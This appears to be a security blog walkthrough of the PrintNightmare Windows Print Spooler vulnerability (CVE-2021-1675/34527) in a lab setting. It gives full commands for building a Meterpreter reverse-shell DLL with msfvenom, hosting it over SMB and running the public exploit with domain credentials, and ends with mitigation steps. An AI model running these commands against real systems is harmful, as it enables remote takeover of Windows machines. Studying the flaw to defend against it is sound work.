ABOUT THE WINDOWS PRINT SPOOLER
A printer spooler is an application which manages the paper printing jobs sent from a computer to a printer and also this service allows the system to act as print clients or print servers. It’s a definite to have a print spooler service on the computer to connect to a printer and main disadvantage of this service is that its enabled by default runs within the SYSTEM context so attackers could easily exploit this service to gain privileged access on the system.This attack is mainly used in domain controllers for printer pruning. In a domain controller printers are objects and the pruning process by which printers that are published but which are no longer available on the network are removed from the AD to prevent users from trying to print to non-existent printers, basically the printer pruning eliminates the issue for the users reaching out to a non-existent printer.
This vulnerability exists due to an authorisation bypass bug in the Print Spooler service spoolsv.exe on Windows systems, which allows authenticated remote users to install print drivers using the RPC call RpcAddPrinterDriver and specify a driver file located on a remote location.
For this vulnerability there are 2 Types of CVE’s one is for LPE and the other is for RCE but recently the exploit which was for LPE was rename for a RCE exploit which is CVE-2021–1675.
1.CVE-2021–1675 → This exploit successfully works on both the attack vectors LPE and RCE. At first Microsoft has classified this CVE as LPE but later on they have changed into RemoteCodeExecution. As for your knowledge the LPE exploit is named as “SharpPrintNightmare”
2.CVE-2021–34527 → Using this exploit the attackers could remotely inject the malicious DLL file by hosting the DLL file on a SMB server.
HOW TO EXPLOIT THE VULNERABILITY REMOTELY
When an attacker tries to exploit the print spooler remotely To verify whether a host is vulnerable for the printnightmare flaw we could use a tool named “rpcdump.py”
┌──(root㉿snowdox)-[/home/snowdox]
└─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
EXPLOITATION
In order to exploit this vulnerability, the delivery method of this exploit is a malicious DLL. This method is also called as a ‘File-less’ exploitation which helps us to bypass most of the protections on the system, such as the antivirus software. In this attack I am gonna trick the print spooler service to install a new driver from an UNC path and load the driver but in our case it’s the malicious DLL and this would give us a reverse shell to our attacker machine. To create our malicious DLL I’ll be using ‘msfvenom’ and since our architecture is a windows 64 bit machine I’ll be embedding a Windows x64 payload to the DLL, providing the LocalHost and the LocalPort which we are gonna start a listener for a callback from the DLL. You can find your IP address of the machine by typing “ifconfig”On a later article I’ll explain you’ll on how to create a DLL using C++ which could be used to add a user to the Windows System and login using the provided credentials if ‘WinRM’ port is open, but for now let’s stick to msfvenom. Use the below command to create your malicious DLL.
┌──(root㉿snowdox)-[/home/snowdox]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.18.103.254 LPORT=9000 -f dll -o /home/snowdox/RedTeam/Print/Print_Mal.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 8704 bytes
Saved as: /home/snowdox/RedTeam/Print/Print_Mal.dll
As we have created our malicious DLL, next we have to start our Listener on the “Metasploit Framework” to get the ‘Meterpreter’ shell back when the DLL is executed on the system. To start the Listener follow the below steps. In the end type ‘exploit -j’ to start the listener in the background.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 9000
LPORT => 9000
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.18.103.254:9000
msf6 exploit(multi/handler) >
Now we have started our listener, let’s start our SMB server to host our malicious DLL file. Go to the system path where you have saved your DLL and enter the below command to start the SMB server, but before that make sure you have installed ‘Impacket’ on the machine. Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. To start the ‘smbserver.py’ script to host our malicious DLL enter the command below within the file directory where you have stored the DLL.
┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
└─# smbserver.py share . -smb2support
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Cool, now we have already set up everything you could start the exploitation process using the
CVE-2021–1675 POC by providing the domain controller and user credentials with the UNC path for the hosted malicious DLL on our system.
┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
└─# python CVE-2021-1675.py NetworkAD-EDU.ENGdepartment.local/jjsmith:wellsaidsecurity143@10.10.220.93 '\\\\10.18.103.254\\share\\Print_Mal.dll'
[*] Connecting to ncacn_np:10.10.220.93[\\PIPE\\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL
[*] Executing \\??\\UNC\\10.18.103.254\\share\\Print_Mal.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
After few seconds running the exploit script, if we go back to the listener we started in ‘Metasploit’ it shows that it has opened a ‘Meterpreter’ session so that now we could interact with victim machine using the ‘Meterpreter shell’.
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share
CVE-2021-1675/34527 implementation.
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
share Path to DLL. Example '\\10.10.10.10\share\evil.dll'
optional arguments:
-h, --help show this help message and exit
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
connection:
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
and you cannot resolve it
-port [destination port]
Destination port to connect to SMB Server
Example;
./CVE-2021-34527.py eng.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\snowdox.dll'
./CVE-2021-34527.py eng.local/domain_user:Pass123@192.168.1.10 'C:\snowdox.dll'
The SharpPrintNightmare/ directory contains the C# Implementation of the Printnightmare exploit, for both Local Privilege Escalation (LPE) (CVE-2021-1675), as well as Remote Code Execution (RCE). The RCE functionality requires execution with local admin privileges on the machine running the exploit.
#LPE
C:\SharpPrintNightmare.exe C:\snowdox.dll
#RCE using existing context
SharpPrintNightmare.exe '\\10.143.1.15\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\10.19.1.15'
#RCE using runas /netonly
SharpPrintNightmare.exe '\\10.143.1.15\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' domain.local domain_username password
MITIGATION
METHOD 1-:
DISABLING PRINT SPOOLER SERVICE USING POWERSHELL
To protect your infrastructure against the PrintNightmare Vulnerability you need to first identify the service in your infrastructure in this case it’s you “Active Directory”. Using the following Powershell CMDlet identify the PrintSpooler Service.
PS C:\Users\Nathaneal> Get-Service -Name Spooler Status Name DisplayName
Running Spooler Print Spooler From the above result you can see that the System has a running “Print Spooler” Service. Next if your organisation is fine with disabling this Service we could use powershell to disable the Print Spooler service.
PS C:\\Users\\Nathaneal> Stop-Service -Name Spooler -Force
This command will disable the service currently in the system or the Active Direcotry which it’s connected to.
PS C:\\Users\\Nathaneal> Set-Service -Name Spooler -StartUpType disabled
This command will make sure that this service is not started on reboot of the system. After disabling the service completly you could use “rpcdump.py” tool to confirm that the system is not vulnerable for the PrintNightmare exploit
┌──(root㉿snowdox)-[/home/snowdox]
└─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
After executing the above command the service is no longer shown and the both the exploits doesn’t work on the system(RCE and LPE).
METHOD 2-:
You can also configure the settings via Group Policy as follows -:
Computer Configuration / Administrative Templates / Printers
Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks.
This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.